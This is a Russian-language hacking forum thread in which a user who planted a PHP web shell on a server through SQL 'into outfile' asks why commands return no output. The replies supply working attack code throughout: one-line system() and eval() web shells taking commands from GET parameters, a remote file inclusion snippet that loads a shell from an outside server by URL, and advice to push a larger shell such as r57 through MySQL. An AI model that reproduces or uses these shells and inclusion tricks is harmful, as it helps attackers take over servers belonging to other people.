проблема с шеллом !

загрузил шелл через " into outfile " простои типа :

PHP:

 <? system($_GET['c']); ?> 

но при виполнения любои команды типа "ls" ничего не случяется и результат никакои ! help !!

 

Сейф мод ON>?
WinOs>?
include заюзать>?

 

подскажи как ??? проверить Сейф мод ??
include заюзать ???

 

пиши в РНР файле

PHP:

if (isset($_GET['shell'])) {
include($_GET['shell'];
}


потом юзай так:

Code:

http://site/script.php?shell=http://server/shell.txt

юзай php.net

 

а если так require_once(ROOT_DIR.'/shell.php');

 

ставид вот ето :

получил ето :

 

<? if (isset($_GET['shell'])) { include($_GET['shell']); } ?>
скобочку забыл ... учи пхп

 

у тя скобки не хватает.

Code:

<? if (isset($_GET['shell'])) { include($_GET['shell'][B])[/B]; } ?>

это если шелл на серваке который ты взломал уже.

 

чё делоть ??? ищё может чтото ?

 

Ты уверен что он залился???? куда заливал - в /tmp или ты узнал путь от корня и нашел папку с правами на запись? Я склоняюсь к ответу что он просто не залился......

 

ок но как обеснить ето : при выполнение пустои команды вот рез:

есль можно по подробнее о том как залить его в /tmp а потом исполизовать !?

 

ну так ёмаё замени shell на http://site.ru/shell.php и всё

 

я английский знаю но при выполнение команды ls ничего не показивает !!
как можно стартануть из /tmp шелл ???

 

Ali_MiX !!! да я всё понял так и зделол и вот каким был результат !!

 

разумеется он залился смотри предыдущий пост
раз урл-инклуд disabled я бы
1)попытался залить шелл через приложения на сервере
2)попробывал бы не через system()

:add сорри забыл страницу обновить, но оба варианта актуальны)

 

пожалуста по подробнее или силку где почитать можно !

 

да просто там запрещен инклуд файлов что то такое функция какая то отключена почитай на форуме много таких тем было

 

PHP:

<?php phpinfo(); ?>

получишь phpinfo() а внём уже найдешь информацию про сейф мод.

или так:

PHP:

<?php eval($_GET['e']); ?>

http://site/shell.php?e=phpinfo();

Так сможешь выполнять php код.

====================================

Не совсем понял что ты хотел сказать...
Но инклудить вот так: include('http://site/shell.php'); нельзя, т.к. ЭТО во первых будет инклудом удалённого файла, а он у него запрещен (это видно из ошибки), а во вторых проинклудиться в таком случае не сам php код, а результат работы скрипта, а это разные вещи.

====================================

Не 'что то такое', а там запрещен инклуд удалённых файлов (т.е. размещенных на другом сайте).

====================================

to TC, если у тебя так плохо с пхп, то тебе будет проще залить через мускул (ты вроде написал что через него заливал) шелл побольше, что нидь с интерфейсом, или к примеру аплодилку файлов (код у неё не большой) и уже так перезалить что нидь типа r57.

P.S. для вопросов есть, вообще то, специальная, прикреплённая тема.
P.P.S. за советы типа Учи английский буду ставить минусы.